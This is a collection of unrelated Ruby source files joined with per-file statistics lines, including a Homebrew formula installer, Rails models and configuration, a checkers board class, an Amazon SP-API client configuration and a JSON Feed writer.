require 'hooks/bottles'
class FormulaInstaller
include FormulaCellarChecks
def self.mode_attr_accessor(*names)
attr_accessor(*names)
names.each { |name| define_method("#{name}?") { !!send(name) }}
end
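  # Note: e.g. `mode_attr_accessor :verbose` defines #verbose and #verbose= plus a
  # #verbose? predicate that coerces the stored value to a boolean.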
attr_reader :f
attr_accessor :options
mode_attr_accessor :show_summary_heading, :show_header
mode_attr_accessor :build_from_source, :build_bottle, :force_bottle
mode_attr_accessor :ignore_deps, :only_deps, :interactive
mode_attr_accessor :verbose, :debug
def initialize ff
@f = ff
@show_header = false
@ignore_deps = false
@only_deps = false
@build_from_source = false
@build_bottle = false
@force_bottle = false
@interactive = false
@verbose = false
@debug = false
@options = Options.new
@@attempted ||= Set.new
@poured_bottle = false
@pour_failed = false
end
def pour_bottle? install_bottle_options={:warn=>false}
return true if Homebrew::Hooks::Bottles.formula_has_bottle?(f)
return false if @pour_failed
return true if force_bottle? && f.bottle
return false if build_from_source? || build_bottle? || interactive?
return false unless options.empty?
return true if f.local_bottle_path
return false unless f.bottle && f.pour_bottle?
f.requirements.each do |req|
next if req.optional? || req.pour_bottle?
if install_bottle_options[:warn]
ohai "Building source; bottle blocked by #{req} requirement"
end
return false
end
unless f.bottle.compatible_cellar?
if install_bottle_options[:warn]
opoo "Building source; cellar of #{f}'s bottle is #{f.bottle.cellar}"
end
return false
end
true
end
def install_bottle_for_dep?(dep, build)
return false if build_from_source?
return false unless dep.bottle && dep.pour_bottle?
return false unless build.used_options.empty?
return false unless dep.bottle.compatible_cellar?
return true
end
def prelude
verify_deps_exist unless ignore_deps?
lock
check_install_sanity
end
def verify_deps_exist
f.recursive_dependencies.map(&:to_formula)
rescue TapFormulaUnavailableError => e
Homebrew.install_tap(e.user, e.repo)
retry
rescue FormulaUnavailableError => e
e.dependent = f.name
raise
end
def check_install_sanity
raise FormulaInstallationAlreadyAttemptedError, f if @@attempted.include? f
if f.installed?
msg = "#{f}-#{f.installed_version} already installed"
msg << ", it's just not linked" unless f.linked_keg.symlink? or f.keg_only?
raise FormulaAlreadyInstalledError, msg
end
# Building head-only without --HEAD is an error
if not ARGV.build_head? and f.stable.nil?
raise CannotInstallFormulaError, <<-EOS.undent
#{f} is a head-only formula
        Install with `brew install --HEAD #{f.name}`
EOS
end
# Building stable-only with --HEAD is an error
if ARGV.build_head? and f.head.nil?
raise CannotInstallFormulaError, "No head is defined for #{f.name}"
end
unless ignore_deps?
unlinked_deps = f.recursive_dependencies.map(&:to_formula).select do |dep|
dep.installed? and not dep.keg_only? and not dep.linked_keg.directory?
end
raise CannotInstallFormulaError,
"You must `brew link #{unlinked_deps*' '}' before #{f} can be installed" unless unlinked_deps.empty?
end
end
def build_bottle_preinstall
@etc_var_glob ||= "#{HOMEBREW_PREFIX}/{etc,var}/**/*"
@etc_var_preinstall = Dir[@etc_var_glob]
end
def build_bottle_postinstall
@etc_var_postinstall = Dir[@etc_var_glob]
(@etc_var_postinstall - @etc_var_preinstall).each do |file|
Pathname.new(file).cp_path_sub(HOMEBREW_PREFIX, f.bottle_prefix)
end
end
def install
# not in initialize so upgrade can unlink the active keg before calling this
# function but after instantiating this class so that it can avoid having to
# relink the active keg if possible (because it is slow).
if f.linked_keg.directory?
# some other version is already installed *and* linked
raise CannotInstallFormulaError, <<-EOS.undent
#{f}-#{f.linked_keg.resolved_path.basename} already installed
To install this version, first `brew unlink #{f}'
EOS
end
check_conflicts
compute_and_install_dependencies unless ignore_deps?
return if only_deps?
if build_bottle? && (arch = ARGV.bottle_arch) && !Hardware::CPU.optimization_flags.include?(arch)
raise "Unrecognized architecture for --bottle-arch: #{arch}"
end
oh1 "Installing #{Tty.green}#{f}#{Tty.reset}" if show_header?
@@attempted << f
begin
if pour_bottle? :warn => true
pour
@poured_bottle = true
stdlibs = Keg.new(f.prefix).detect_cxx_stdlibs
stdlib_in_use = CxxStdlib.new(stdlibs.first, MacOS.default_compiler)
begin
stdlib_in_use.check_dependencies(f, f.recursive_dependencies)
rescue IncompatibleCxxStdlibs => e
opoo e.message
end
stdlibs = Keg.new(f.prefix).detect_cxx_stdlibs :skip_executables => true
tab = Tab.for_keg f.prefix
tab.poured_from_bottle = true
tab.write
end
rescue => e
raise e if ARGV.homebrew_developer?
@pour_failed = true
onoe e.message
opoo "Bottle installation failed: building from source."
end
build_bottle_preinstall if build_bottle?
unless @poured_bottle
compute_and_install_dependencies if @pour_failed and not ignore_deps?
build
clean
end
build_bottle_postinstall if build_bottle?
opoo "Nothing was installed to #{f.prefix}" unless f.installed?
end
# HACK: If readline is present in the dependency tree, it will clash
# with the stdlib's Readline module when the debugger is loaded
def perform_readline_hack
if (f.recursive_dependencies.any? { |d| d.name == "readline" } || f.name == "readline") && debug?
ENV['HOMEBREW_NO_READLINE'] = '1'
end
end
def check_conflicts
return if ARGV.force?
conflicts = f.conflicts.reject do |c|
keg = Formula.factory(c.name).prefix
not keg.directory? && Keg.new(keg).linked?
end
raise FormulaConflictError.new(f, conflicts) unless conflicts.empty?
end
def compute_and_install_dependencies
perform_readline_hack
req_map, req_deps = expand_requirements
check_requirements(req_map)
deps = [].concat(req_deps).concat(f.deps)
deps = expand_dependencies(deps)
if deps.empty? and only_deps?
puts "All dependencies for #{f} are satisfied."
else
install_dependencies(deps)
end
end
def check_requirements(req_map)
fatals = []
req_map.each_pair do |dependent, reqs|
reqs.each do |req|
puts "#{dependent}: #{req.message}"
fatals << req if req.fatal?
end
end
raise UnsatisfiedRequirements.new(f, fatals) unless fatals.empty?
end
def expand_requirements
unsatisfied_reqs = Hash.new { |h, k| h[k] = [] }
deps = []
formulae = [f]
while f = formulae.pop
ARGV.filter_for_dependencies do
f.recursive_requirements do |dependent, req|
build = effective_build_options_for(dependent)
if (req.optional? || req.recommended?) && build.without?(req)
Requirement.prune
elsif req.build? && dependent == f && pour_bottle?
Requirement.prune
elsif req.build? && dependent != f && install_bottle_for_dep?(dependent, build)
Requirement.prune
elsif req.satisfied?
Requirement.prune
elsif req.default_formula?
dep = req.to_dependency
deps.unshift(dep)
formulae.unshift(dep.to_formula)
Requirement.prune
else
unsatisfied_reqs[dependent] << req
end
end
end
end
return unsatisfied_reqs, deps
end
def expand_dependencies(deps)
inherited_options = {}
expanded_deps = ARGV.filter_for_dependencies do
Dependency.expand(f, deps) do |dependent, dep|
options = inherited_options[dep.name] = inherited_options_for(dep)
build = effective_build_options_for(
dependent,
inherited_options.fetch(dependent.name, [])
)
if (dep.optional? || dep.recommended?) && build.without?(dep)
Dependency.prune
elsif dep.build? && dependent == f && pour_bottle?
Dependency.prune
elsif dep.build? && dependent != f && install_bottle_for_dep?(dependent, build)
Dependency.prune
elsif dep.satisfied?(options)
Dependency.skip
end
end
end
expanded_deps.map { |dep| [dep, inherited_options[dep.name]] }
end
def effective_build_options_for(dependent, inherited_options=[])
if dependent == f
build = dependent.build.dup
build.args |= options
build
else
build = dependent.build.dup
build.args |= inherited_options
build
end
end
def inherited_options_for(dep)
inherited_options = Options.new
if (options.include?("universal") || f.build.universal?) && !dep.build? && dep.to_formula.build.has_option?("universal")
inherited_options << Option.new("universal")
end
inherited_options
end
def install_dependencies(deps)
if deps.length > 1
oh1 "Installing dependencies for #{f}: #{Tty.green}#{deps.map(&:first)*", "}#{Tty.reset}"
end
ARGV.filter_for_dependencies do
deps.each { |dep, options| install_dependency(dep, options) }
end
@show_header = true unless deps.empty?
end
class DependencyInstaller < FormulaInstaller
def initialize ff
super
@ignore_deps = true
end
def sanitized_ARGV_options
args = super
args.delete "--ignore-dependencies"
args
end
end
def install_dependency(dep, inherited_options)
df = dep.to_formula
tab = Tab.for_formula(df)
if df.linked_keg.directory?
linked_keg = Keg.new(df.linked_keg.resolved_path)
linked_keg.unlink
end
if df.installed?
installed_keg = Keg.new(df.prefix)
tmp_keg = Pathname.new("#{installed_keg}.tmp")
installed_keg.rename(tmp_keg)
end
fi = DependencyInstaller.new(df)
fi.options |= tab.used_options
fi.options |= dep.options
fi.options |= inherited_options
fi.build_from_source = build_from_source?
fi.verbose = verbose? unless verbose == :quieter
fi.debug = debug?
fi.prelude
oh1 "Installing #{f} dependency: #{Tty.green}#{dep.name}#{Tty.reset}"
fi.install
fi.caveats
fi.finish
rescue Exception
ignore_interrupts do
tmp_keg.rename(installed_keg) if tmp_keg && !installed_keg.directory?
linked_keg.link if linked_keg
end
raise
else
ignore_interrupts { tmp_keg.rmtree if tmp_keg && tmp_keg.directory? }
end
def caveats
return if only_deps?
if ARGV.homebrew_developer? and not f.keg_only?
audit_bin
audit_sbin
audit_lib
audit_man
audit_info
end
c = Caveats.new(f)
unless c.empty?
@show_summary_heading = true
ohai 'Caveats', c.caveats
end
end
def finish
return if only_deps?
ohai 'Finishing up' if verbose?
install_plist
if f.keg_only?
begin
Keg.new(f.prefix).optlink
rescue Exception
onoe "Failed to create: #{f.opt_prefix}"
puts "Things that depend on #{f} will probably not build."
end
else
link
end
fix_install_names if OS.mac?
post_install
ohai "Summary" if verbose? or show_summary_heading?
puts summary
ensure
unlock if hold_locks?
end
def emoji
ENV['HOMEBREW_INSTALL_BADGE'] || "\xf0\x9f\x8d\xba"
end
def summary
s = ""
s << "#{emoji} " if MacOS.version >= :lion and not ENV['HOMEBREW_NO_EMOJI']
s << "#{f.prefix}: #{f.prefix.abv}"
s << ", built in #{pretty_duration build_time}" if build_time
s
end
def build_time
@build_time ||= Time.now - @start_time if @start_time && !interactive?
end
def sanitized_ARGV_options
args = []
args << "--ignore-dependencies" if ignore_deps?
if build_bottle?
args << "--build-bottle"
args << "--bottle-arch=#{ARGV.bottle_arch}" if ARGV.bottle_arch
end
if interactive?
args << "--interactive"
args << "--git" if interactive == :git
end
args << "--verbose" if verbose?
args << "--debug" if debug?
args << "--cc=#{ARGV.cc}" if ARGV.cc
args << "--env=#{ARGV.env}" if ARGV.env
args << "--HEAD" if ARGV.build_head?
args << "--devel" if ARGV.build_devel?
f.build.each do |opt, _|
name = opt.name[/\A(.+)=\z/, 1]
value = ARGV.value(name)
args << "--#{name}=#{value}" if name && value
end
args
end
def build_argv
opts = Options.coerce(sanitized_ARGV_options)
opts.concat(options)
opts
end
def build
FileUtils.rm Dir["#{HOMEBREW_LOGS}/#{f}/*"]
@start_time = Time.now
# 1. formulae can modify ENV, so we must ensure that each
# installation has a pristine ENV when it starts, forking now is
# the easiest way to do this
# 2. formulae have access to __END__ the only way to allow this is
# to make the formula script the executed script
read, write = IO.pipe
# I'm guessing this is not a good way to do this, but I'm no UNIX guru
ENV['HOMEBREW_ERROR_PIPE'] = write.to_i.to_s
args = %W[
nice #{RUBY_PATH}
-W0
-I #{File.dirname(__FILE__)}
-rbuild
--
#{f.path}
].concat(build_argv)
# Ruby 2.0+ sets close-on-exec on all file descriptors except for
# 0, 1, and 2 by default, so we have to specify that we want the pipe
# to remain open in the child process.
args << { write => write } if RUBY_VERSION >= "2.0"
pid = fork do
begin
read.close
exec(*args)
rescue Exception => e
Marshal.dump(e, write)
write.close
exit! 1
end
end
ignore_interrupts(:quietly) do # the child will receive the interrupt and marshal it back
write.close
Process.wait(pid)
data = read.read
read.close
raise Marshal.load(data) unless data.nil? or data.empty?
raise Interrupt if $?.exitstatus == 130
raise "Suspicious installation failure" unless $?.success?
end
raise "Empty installation" if Dir["#{f.prefix}/*"].empty?
rescue Exception
ignore_interrupts do
# any exceptions must leave us with nothing installed
f.prefix.rmtree if f.prefix.directory?
f.rack.rmdir_if_possible
end
raise
end
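  # A reduced sketch of the fork + Marshal-over-a-pipe pattern the build method
  # above relies on (added for illustration only; `do_work` is a placeholder and
  # nothing in Homebrew calls this):
  #
  #   read, write = IO.pipe
  #   pid = fork do
  #     read.close
  #     begin
  #       do_work
  #     rescue Exception => e
  #       Marshal.dump(e, write)  # serialize the child's failure
  #       write.close
  #       exit! 1
  #     end
  #   end
  #   write.close
  #   Process.wait(pid)
  #   data = read.read
  #   read.close
  #   raise Marshal.load(data) unless data.nil? || data.empty?  # re-raise in the parent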
def link
if f.linked_keg.directory? and f.linked_keg.resolved_path == f.prefix
opoo "This keg was marked linked already, continuing anyway"
# otherwise Keg.link will bail
f.linked_keg.unlink
end
keg = Keg.new(f.prefix)
begin
keg.link
rescue Keg::LinkError => e
onoe "The `brew link` step did not complete successfully"
puts "The formula built, but is not symlinked into #{HOMEBREW_PREFIX}"
puts "You can try again using:"
puts " brew link #{f.name}"
puts
puts "Possible conflicting files are:"
mode = OpenStruct.new(:dry_run => true, :overwrite => true)
keg.link(mode)
@show_summary_heading = true
rescue Exception => e
onoe "An unexpected error occurred during the `brew link` step"
puts "The formula built, but is not symlinked into #{HOMEBREW_PREFIX}"
puts e
puts e.backtrace if debug?
@show_summary_heading = true
ignore_interrupts { keg.unlink }
raise
end
end
def install_plist
return unless f.plist
f.plist_path.atomic_write(f.plist)
f.plist_path.chmod 0644
rescue Exception => e
onoe "Failed to install plist file"
ohai e, e.backtrace if debug?
end
def fix_install_names
keg = Keg.new(f.prefix)
keg.fix_install_names(:keg_only => f.keg_only?)
if @poured_bottle
keg.relocate_install_names Keg::PREFIX_PLACEHOLDER, HOMEBREW_PREFIX.to_s,
Keg::CELLAR_PLACEHOLDER, HOMEBREW_CELLAR.to_s, :keg_only => f.keg_only?
end
rescue Exception => e
onoe "Failed to fix install names"
puts "The formula built, but you may encounter issues using it or linking other"
puts "formula against it."
ohai e, e.backtrace if debug?
@show_summary_heading = true
end
def clean
ohai "Cleaning" if verbose?
Cleaner.new(f).clean
rescue Exception => e
opoo "The cleaning step did not complete successfully"
puts "Still, the installation was successful, so we will link it into your prefix"
ohai e, e.backtrace if debug?
@show_summary_heading = true
end
def post_install
f.post_install
rescue Exception => e
opoo "The post-install step did not complete successfully"
puts "You can try again using `brew postinstall #{f.name}`"
ohai e, e.backtrace if debug?
@show_summary_heading = true
end
def pour
if Homebrew::Hooks::Bottles.formula_has_bottle?(f)
return if Homebrew::Hooks::Bottles.pour_formula_bottle(f)
end
if f.local_bottle_path
downloader = LocalBottleDownloadStrategy.new(f)
else
bottle = f.bottle
downloader = bottle.downloader
bottle.verify_download_integrity(bottle.fetch)
end
HOMEBREW_CELLAR.cd do
downloader.stage
end
Dir["#{f.bottle_prefix}/{etc,var}/**/*"].each do |file|
path = Pathname.new(file)
path.extend(InstallRenamed)
path.cp_path_sub(f.bottle_prefix, HOMEBREW_PREFIX)
end
FileUtils.rm_rf f.bottle_prefix
end
## checks
def print_check_output warning_and_description
return unless warning_and_description
warning, description = *warning_and_description
opoo warning
puts description
@show_summary_heading = true
end
def audit_bin
print_check_output(check_PATH(f.bin)) unless f.keg_only?
print_check_output(check_non_executables(f.bin))
print_check_output(check_generic_executables(f.bin))
end
def audit_sbin
print_check_output(check_PATH(f.sbin)) unless f.keg_only?
print_check_output(check_non_executables(f.sbin))
print_check_output(check_generic_executables(f.sbin))
end
def audit_lib
print_check_output(check_jars)
print_check_output(check_non_libraries)
end
def audit_man
print_check_output(check_manpages)
end
def audit_info
print_check_output(check_infopages)
end
private
def hold_locks?
@hold_locks || false
end
def lock
if (@@locked ||= []).empty?
f.recursive_dependencies.each do |dep|
@@locked << dep.to_formula
end unless ignore_deps?
@@locked.unshift(f)
@@locked.uniq!
@@locked.each(&:lock)
@hold_locks = true
end
end
def unlock
if hold_locks?
@@locked.each(&:unlock)
@@locked.clear
@hold_locks = false
end
end
end
class Formula
def keg_only_text
s = "This formula is keg-only, so it was not symlinked into #{HOMEBREW_PREFIX}."
s << "\n\n#{keg_only_reason.to_s}"
if lib.directory? or include.directory?
s <<
<<-EOS.undent_________________________________________________________72
Generally there are no consequences of this for you. If you build your
own software and it requires this formula, you'll need to add to your
build variables:
EOS
s << " LDFLAGS: -L#{HOMEBREW_PREFIX}/opt/#{name}/lib\n" if lib.directory?
s << " CPPFLAGS: -I#{HOMEBREW_PREFIX}/opt/#{name}/include\n" if include.directory?
end
s << "\n"
end
end
| 27.043069 | 124 | 0.661275 |
bf07ffe9c3653b1d77f1640f3b429fdad7e4ed8e | 358 | # frozen_string_literal: true
require_dependency "participant_profile/ecf"
class ParticipantProfile < ApplicationRecord
class ECT < ECF
belongs_to :mentor_profile, class_name: "Mentor", optional: true
has_one :mentor, through: :mentor_profile, source: :user
def ect?
true
end
def participant_type
:ect
end
end
end
| 18.842105 | 68 | 0.715084 |
39d34f353afef3ef2d6b8c012421dd00900a44a2 | 257 | class Review < ActiveRecord::Base
belongs_to :product
validates :author, presence: true
validates :content, presence: true
validates :rating, presence: true, numericality: true, inclusion: { in: 1..5, message: "Rating must be between 1 and 5" }
end
| 36.714286 | 123 | 0.735409 |
d516a7f56bdd418f86fee47e17ebbab5a4dad6f1 | 1,689 | require_relative 'piece'
require_relative '../chess_utils/chess_utils'
class Board
include ChessUtils::Renderable
SIZE = 8
def initialize
@rows = Array.new(SIZE) { Array.new(SIZE) }
end
def [](pos)
row, col = pos
rows[row][col]
end
def []=(pos, mark)
row, col = pos
rows[row][col] = mark
end
def in_range?(pos)
pos.all? { |coord| coord.between?(0, SIZE - 1) }
end
def fill_rows
(0..2).each { |row| fill_row(row, :red) }
(SIZE-3...SIZE).each { |row| fill_row(row, :blue) }
end
def add_piece(piece, pos)
raise 'space not empty' unless empty?(pos)
self[pos] = piece
end
def move_piece(start_pos, end_pos)
self[end_pos] = self[start_pos]
self[start_pos] = nil
end
def remove_piece(piece)
self[piece.pos] = nil
end
def empty?(pos)
return false unless in_range?(pos)
self[pos].nil?
end
def piece?(pos)
return false unless in_range?(pos)
!empty?(pos)
end
def pieces
rows.flatten.compact
end
def won?
pieces.map(&:color).uniq.one?
end
def winner
pieces.first.color
end
def dup
duped_board = self.class.new
pieces.each do |piece|
Piece.new(
board: duped_board,
pos: piece.pos,
color: piece.color,
king: piece.king?,
deltas: piece.deltas
)
end
duped_board
end
protected
attr_reader :rows
private
def fill_row(row, color)
starting_coord = (row.even? ? 0 : 1)
(starting_coord...SIZE).step(2) do |col|
pos = [row, col]
Piece.new(
board: self,
pos: pos,
color: color
)
end
end
end
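# Minimal smoke test, added for illustration only (not part of the original
# game code). It assumes Piece and ChessUtils resolve via the require_relative
# calls at the top of this file, and it only runs when the file is executed
# directly.
if __FILE__ == $0
  board = Board.new
  board.fill_rows
  puts "pieces placed: #{board.pieces.count}"      # 24 for the standard setup
  board.move_piece([2, 0], [3, 1])
  puts "piece at [3, 1]? #{board.piece?([3, 1])}"  # => true
  puts "game won? #{board.won?}"                   # => false, both colors remain
end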
| 15.933962 | 55 | 0.586738 |
62cc45cb064c4a1df0817fa5cec343923289d562 | 5,950 | =begin
#Selling Partner API for Direct Fulfillment Shipping
#The Selling Partner API for Direct Fulfillment Shipping provides programmatic access to a direct fulfillment vendor's shipping data.
OpenAPI spec version: v1
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 3.0.33
=end
module AmzSpApi::VendorDirectFulfillmentShippingApiModel
class Configuration
# Defines url scheme
attr_accessor :scheme
# Defines url host
attr_accessor :host
# Defines url base path
attr_accessor :base_path
# Defines API keys used with API Key authentications.
#
# @return [Hash] key: parameter name, value: parameter value (API key)
#
# @example parameter name is "api_key", API key is "xxx" (e.g. "api_key=xxx" in query string)
# config.api_key['api_key'] = 'xxx'
attr_accessor :api_key
# Defines API key prefixes used with API Key authentications.
#
# @return [Hash] key: parameter name, value: API key prefix
#
# @example parameter name is "Authorization", API key prefix is "Token" (e.g. "Authorization: Token xxx" in headers)
# config.api_key_prefix['api_key'] = 'Token'
attr_accessor :api_key_prefix
# Defines the username used with HTTP basic authentication.
#
# @return [String]
attr_accessor :username
# Defines the password used with HTTP basic authentication.
#
# @return [String]
attr_accessor :password
# Defines the access token (Bearer) used with OAuth2.
attr_accessor :access_token
# Set this to enable/disable debugging. When enabled (set to true), HTTP request/response
# details will be logged with `logger.debug` (see the `logger` attribute).
# Default to false.
#
# @return [true, false]
attr_accessor :debugging
# Defines the logger used for debugging.
# Default to `Rails.logger` (when in Rails) or logging to STDOUT.
#
# @return [#debug]
attr_accessor :logger
# Defines the temporary folder to store downloaded files
# (for API endpoints that have file response).
# Default to use `Tempfile`.
#
# @return [String]
attr_accessor :temp_folder_path
# The time limit for HTTP request in seconds.
# Default to 0 (never times out).
attr_accessor :timeout
# Set this to false to skip client side validation in the operation.
# Default to true.
# @return [true, false]
attr_accessor :client_side_validation
### TLS/SSL setting
# Set this to false to skip verifying SSL certificate when calling API from https server.
# Default to true.
#
# @note Do NOT set it to false in production code, otherwise you would face multiple types of cryptographic attacks.
#
# @return [true, false]
attr_accessor :verify_ssl
### TLS/SSL setting
# Set this to false to skip verifying SSL host name
# Default to true.
#
# @note Do NOT set it to false in production code, otherwise you would face multiple types of cryptographic attacks.
#
# @return [true, false]
attr_accessor :verify_ssl_host
### TLS/SSL setting
# Set this to customize the certificate file to verify the peer.
#
# @return [String] the path to the certificate file
#
# @see The `cainfo` option of Typhoeus, `--cert` option of libcurl. Related source code:
# https://github.com/typhoeus/typhoeus/blob/master/lib/typhoeus/easy_factory.rb#L145
attr_accessor :ssl_ca_cert
### TLS/SSL setting
# Client certificate file (for client certificate)
attr_accessor :cert_file
### TLS/SSL setting
# Client private key file (for client certificate)
attr_accessor :key_file
# Set this to customize parameters encoding of array parameter with multi collectionFormat.
# Default to nil.
#
# @see The params_encoding option of Ethon. Related source code:
# https://github.com/typhoeus/ethon/blob/master/lib/ethon/easy/queryable.rb#L96
attr_accessor :params_encoding
attr_accessor :inject_format
attr_accessor :force_ending_format
def initialize
@scheme = 'https'
@host = 'sellingpartnerapi-na.amazon.com'
@base_path = 'https://sellingpartnerapi-na.amazon.com/'
@api_key = {}
@api_key_prefix = {}
@timeout = 0
@client_side_validation = true
@verify_ssl = true
@verify_ssl_host = true
@params_encoding = nil
@cert_file = nil
@key_file = nil
@debugging = false
@inject_format = false
@force_ending_format = false
@logger = defined?(Rails) ? Rails.logger : Logger.new(STDOUT)
yield(self) if block_given?
end
# The default Configuration object.
def self.default
@@default ||= Configuration.new
end
def configure
yield(self) if block_given?
end
def scheme=(scheme)
# remove :// from scheme
@scheme = scheme.sub(/:\/\//, '')
end
def host=(host)
# remove http(s):// and anything after a slash
@host = host.sub(/https?:\/\//, '').split('/').first
end
def base_path=(base_path)
# Add leading and trailing slashes to base_path
@base_path = "/#{base_path}".gsub(/\/+/, '/')
@base_path = '' if @base_path == '/'
end
def base_url
"#{scheme}://#{[host, base_path].join('/').gsub(/\/+/, '/')}".sub(/\/+\z/, '')
end
# Gets API key (with prefix if set).
# @param [String] param_name the parameter name of API key auth
def api_key_with_prefix(param_name)
if @api_key_prefix[param_name]
"#{@api_key_prefix[param_name]} #{@api_key[param_name]}"
else
@api_key[param_name]
end
end
# Gets Basic Auth token string
def basic_auth_token
'Basic ' + ["#{username}:#{password}"].pack('m').delete("\r\n")
end
# Returns Auth Settings hash for api client.
def auth_settings
{
}
end
end
end
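# Illustrative configuration (not generated code; the values are placeholders).
# Configuration.default and #configure are defined above:
#
#   AmzSpApi::VendorDirectFulfillmentShippingApiModel::Configuration.default.configure do |config|
#     config.timeout = 10       # seconds; 0 (the default) never times out
#     config.debugging = true   # log requests/responses via config.logger
#   end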
| 29.899497 | 133 | 0.661176 |
edae7d9e62b91ff28718d09292c10142ac6d89b0 | 4,795 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# Code is not reloaded between requests.
config.cache_classes = true
# Eager load code on boot. This eager loads most of Rails and
# your application in memory, allowing both threaded web servers
# and those relying on copy on write to perform better.
# Rake tasks automatically ignore this option for performance.
config.eager_load = true
# Full error reports are disabled and caching is turned on.
config.consider_all_requests_local = false
# Ensures that a master key has been made available in either ENV["RAILS_MASTER_KEY"]
# or in config/master.key. This key is used to decrypt credentials (and other encrypted files).
# config.require_master_key = true
# Disable serving static files from the `/public` folder by default since
# Apache or NGINX already handles this.
config.public_file_server.enabled = ENV['RAILS_SERVE_STATIC_FILES'].present?
# Enable serving of images, stylesheets, and JavaScripts from an asset server.
# config.action_controller.asset_host = 'http://assets.example.com'
# Specifies the header that your server uses for sending files.
# config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache
# config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX
# Store uploaded files on the local file system (see config/storage.yml for options).
config.active_storage.service = :local
# Mount Action Cable outside main process or domain.
# config.action_cable.mount_path = nil
# config.action_cable.url = 'wss://example.com/cable'
# config.action_cable.allowed_request_origins = [ 'http://example.com', /http:\/\/example.*/ ]
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
# config.force_ssl = true
# Use the lowest log level to ensure availability of diagnostic information
# when problems arise.
config.log_level = :debug
# Prepend all log lines with the following tags.
config.log_tags = [ :request_id ]
# Use a different cache store in production.
# config.cache_store = :mem_cache_store
# Use a real queuing backend for Active Job (and separate queues per environment).
# config.active_job.queue_adapter = :resque
# config.active_job.queue_name_prefix = "js_project_100_days_of_code_api_production"
config.action_mailer.perform_caching = false
# Ignore bad email addresses and do not raise email delivery errors.
# Set this to true and configure the email server for immediate delivery to raise delivery errors.
# config.action_mailer.raise_delivery_errors = false
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation cannot be found).
config.i18n.fallbacks = true
# Send deprecation notices to registered listeners.
config.active_support.deprecation = :notify
# Use default logging formatter so that PID and timestamp are not suppressed.
config.log_formatter = ::Logger::Formatter.new
# Use a different logger for distributed setups.
# require 'syslog/logger'
# config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new 'app-name')
if ENV["RAILS_LOG_TO_STDOUT"].present?
logger = ActiveSupport::Logger.new(STDOUT)
logger.formatter = config.log_formatter
config.logger = ActiveSupport::TaggedLogging.new(logger)
end
# Do not dump schema after migrations.
config.active_record.dump_schema_after_migration = false
# Inserts middleware to perform automatic connection switching.
# The `database_selector` hash is used to pass options to the DatabaseSelector
# middleware. The `delay` is used to determine how long to wait after a write
# to send a subsequent read to the primary.
#
# The `database_resolver` class is used by the middleware to determine which
# database is appropriate to use based on the time delay.
#
# The `database_resolver_context` class is used by the middleware to set
# timestamps for the last write to the primary. The resolver uses the context
# class timestamps to determine how long to wait before reading from the
# replica.
#
# By default Rails will store a last write timestamp in the session. The
# DatabaseSelector middleware is designed as such you can define your own
# strategy for connection switching and pass that into the middleware through
# these configuration options.
# config.active_record.database_selector = { delay: 2.seconds }
# config.active_record.database_resolver = ActiveRecord::Middleware::DatabaseSelector::Resolver
# config.active_record.database_resolver_context = ActiveRecord::Middleware::DatabaseSelector::Resolver::Session
end
| 45.235849 | 114 | 0.763295 |
b9e63420120b45ff40396137cc4daa8b461c14e7 | 215 | $LOAD_PATH.unshift(File.dirname(__FILE__))
$LOAD_PATH.unshift(File.join(File.dirname(__FILE__), '..', 'lib'))
require 'sinatra-forms'
require 'spec'
require 'spec/autorun'
Spec::Runner.configure do |config|
end
| 21.5 | 66 | 0.739535 |
ab273739648c4e6ae88020d3e2011ec75ca8e26f | 1,425 | require 'htmlentities'
require 'json'
require_relative 'entry'
class DestinationFeed
def self.write_review_feed( app_name, entries, dest_file_path, dest_feed_url )
json_structure = Hash.new
json_structure['version'] = 'https://jsonfeed.org/version/1'
json_structure['title'] = "App Store Reviews of #{app_name}"
json_structure['home_page_url'] = 'https://itunesconnect.apple.com/'
json_structure['feed_url'] = dest_feed_url
items = Array.new
item_url = "https://itunesconnect.apple.com/"
html_encoder = HTMLEntities.new
if (entries.length == 0)
placeholder_date_string = '2018-01-01T00:00:00+00:00'
entry_element = {'id' => 'placeholder', 'title' => '(placeholder)', 'content_html' => '<p>This is a placeholder, because some services will not allow you to subscribe to a JSON Feed that has an empty list of items.</p>', 'url' => item_url }
items.push(entry_element)
end
entries.each do |entry|
author_element = {'name' => entry.author}
entry_element = {'id' => entry.entry_id, 'title' => entry.title, 'content_html' => entry.html, 'url' => item_url, 'author' => author_element, 'date_published' => entry.date}
items.push(entry_element)
end
json_structure['items'] = items
tmp_file_path = "#{dest_file_path}.tmp"
File.open(tmp_file_path,"w") do |f|
f.write(JSON.pretty_generate(json_structure))
end
File.rename(tmp_file_path, dest_file_path)
end
end | 35.625 | 243 | 0.710175 |
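# Illustrative call (values are placeholders). Each entry is expected to
# respond to #author, #entry_id, #title, #html and #date, as used above; the
# Entry class itself lives in the required 'entry' file.
#
#   DestinationFeed.write_review_feed(
#     "My App",
#     entries,
#     "/var/www/feeds/reviews.json",
#     "https://example.com/feeds/reviews.json"
#   )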
08b7f42b1dda49354b622c458b4076e365a1abe7 | 581 | # frozen_string_literal: true
require 'rails_helper'
RSpec.describe 'GET /staff/people/:id' do
let!(:person) { create :initial_person }
let(:current_account) { create :usual_account }
def make_request
get "/staff/people/#{person.id}"
end
before do
sign_in current_account.user if current_account&.user
make_request
end
for_account_types nil, :usual do
specify do
expect(response).to have_http_status :forbidden
end
end
for_account_types :superuser do
specify do
expect(response).to have_http_status :ok
end
end
end
| 19.366667 | 57 | 0.712565 |
4a0c12d81627aaa585b7e0b4dd6824a0e272661a | 597 | # Class for A-B testing variants. A variant is a set of changes
# to the same element on a page. For example, a variant can be used
# to change the button text, or images displayed, or even more
# complicated behavior
class Caboose::AbVariant < ActiveRecord::Base
self.table_name = "ab_variants"
has_many :ab_options, -> { order(:id) }, :dependent => :destroy
has_many :ab_values, :dependent => :destroy
attr_accessible :name, :analytics_name
def random_option
return nil if self.ab_options.nil? || self.ab_options.count == 0
return self.ab_options.sample
end
end
| 33.166667 | 68 | 0.720268 |
28992d9f303bdedd1b670a35b1fee692e4bd290c | 41 | module ItunesCsv
VERSION = "0.0.3"
end
| 10.25 | 19 | 0.682927 |
acbbc919688a915f528cfd7c5235ee5942def447 | 3,718 | class NotificationGenerator < Rails::Generators::Base
